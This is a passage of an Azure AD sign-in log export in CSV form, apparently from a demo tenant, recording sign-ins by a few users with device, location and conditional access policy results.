'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:51,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",3949c48a-9763-4b53-8733-2ecee1536300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3949c48a-9763-4b53-8733-2ecee1536300,SigninLogs,Sucess,35.01296997,-80.93171692
+1454,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:01.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 12:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",11779f6a-e330-484b-9e89-76d92b9a1400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,11779f6a-e330-484b-9e89-76d92b9a1400,SigninLogs,Sucess,50.6406517,5.572050095
+1455,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:00.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c9696eea-32b2-450b-89e2-0713b36289a9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",71d7ba06-8885-45d4-a319-08fc87221200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,71d7ba06-8885-45d4-a319-08fc87221200,SigninLogs,Sucess,33.7984581,-84.38828278
+1456,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:04.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d420991d-bdfd-4e10-b037-1dd045d955cd,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",71d7ba06-8885-45d4-a319-08fc0f231200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,71d7ba06-8885-45d4-a319-08fc0f231200,SigninLogs,Sucess,33.7984581,-84.38828278
+1457,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:34.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cf11ce66-667b-4399-88d8-278415af06fd,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c28d974f-07cf-4d4e-a7f6-a6e8050c1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,c28d974f-07cf-4d4e-a7f6-a6e8050c1300,SigninLogs,Sucess,33.7984581,-84.38828278
+1458,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:52.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:51,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",db842515-3a70-4558-864c-28c121ef6f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,db842515-3a70-4558-864c-28c121ef6f00,SigninLogs,Sucess,35.01296997,-80.93171692
+1459,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:26.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 12:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f677c811-7d36-4500-96e1-658272c21300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f677c811-7d36-4500-96e1-658272c21300,SigninLogs,Sucess,50.6406517,5.572050095
+1460,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:22.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,31c031c9-59fd-4af3-bb61-fcc1abdc52b5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",b3c0863d-787e-45d0-a1b5-da54fbc31200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,b3c0863d-787e-45d0-a1b5-da54fbc31200,SigninLogs,Sucess,33.7984581,-84.38828278
+1461,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:28.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8e53896f-343f-4f31-b6f7-80029082a7f0,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 